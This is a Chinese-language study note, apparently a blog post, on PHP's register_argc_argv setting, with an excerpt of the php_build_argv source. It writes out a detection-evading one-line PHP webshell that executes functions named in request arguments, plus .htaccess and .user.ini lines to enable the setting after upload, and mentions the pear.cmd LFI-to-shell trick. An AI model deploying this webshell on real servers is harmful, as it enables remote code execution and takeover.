49.MySQL数据库尾声
611 2023-04-03 03:40:41
可以看到,当开启register_argc_argv后,Cli模式下会注册两个全局变量$argc,$argv。也就是说它同时在$_SERVER中和超全局变量中创建了对应的参数信息。
(这样就有可能出现变量覆盖的情况)
源码分析
/* {{{ php_build_argv */PHPAPI void php_build_argv(const char *s, zval *track_vars_array){zval arr, argc, tmp;int count = 0;if (!(SG(request_info).argc || track_vars_array)) {return;}array_init(&arr);/* Prepare argv */if (SG(request_info).argc) { /* are we in cli sapi? */int i;for (i = 0; i < SG(request_info).argc; i++) {ZVAL_STRING(&tmp, SG(request_info).argv[i]);if (zend_hash_next_index_insert(Z_ARRVAL(arr), &tmp) == NULL) {zend_string_efree(Z_STR(tmp));}}} else if (s && *s) {while (1) {const char *space = strchr(s, '+');//分隔符的设置/* auto-type */ZVAL_STRINGL(&tmp, s, space ? space - s : strlen(s));count++;if (zend_hash_next_index_insert(Z_ARRVAL(arr), &tmp) == NULL) {zend_string_efree(Z_STR(tmp));}if (!space) {break;}s = space + 1;}}/* prepare argc */if (SG(request_info).argc) {ZVAL_LONG(&argc, SG(request_info).argc);} else {ZVAL_LONG(&argc, count);}if (SG(request_info).argc) {Z_ADDREF(arr);zend_hash_update(&EG(symbol_table), ZSTR_KNOWN(ZEND_STR_ARGV), &arr);zend_hash_update(&EG(symbol_table), ZSTR_KNOWN(ZEND_STR_ARGC), &argc);}if (track_vars_array && Z_TYPE_P(track_vars_array) == IS_ARRAY) {Z_ADDREF(arr);zend_hash_update(Z_ARRVAL_P(track_vars_array), ZSTR_KNOWN(ZEND_STR_ARGV), &arr);zend_hash_update(Z_ARRVAL_P(track_vars_array), ZSTR_KNOWN(ZEND_STR_ARGC), &argc);}zval_ptr_dtor_nogc(&arr);}
用这个特性写个高免杀一句话
<?php$argv = $_SERVER['argv'];// var_dump($argv);$argv[0]($argv[1]);
php中对于配置的设置,设置了权限,即并非任何时刻任何地点都能对配置参数进行设置
于是乎,就算配置中默认没开启register_argc_argv选项,但我们可以先上传一个.htaccess(Apache)或.user.ini来对配置进行覆盖
.htaccess
php_value register_argc_argv On
.user.ini
register_argc_argv=On
不知道为什么本地就是不成功,按道理应该是可以的..
将配置修改好后,再次访问成功
利用pear.cmd从LFI到getshell
姿势是真的骚,基础是真的ε=ε=ε=( ̄▽ ̄)
缺少必要的开发及运维知识,导致对很多配置都不熟悉。。。
- .htaccess为什么可以被访问?
是因为未对请求的资源进行过滤,导致可以访问.htaccess或.user.ini
2.apache重写模块配置
https://www.cnblogs.com/liluxiang/p/9450826.html
__EOF__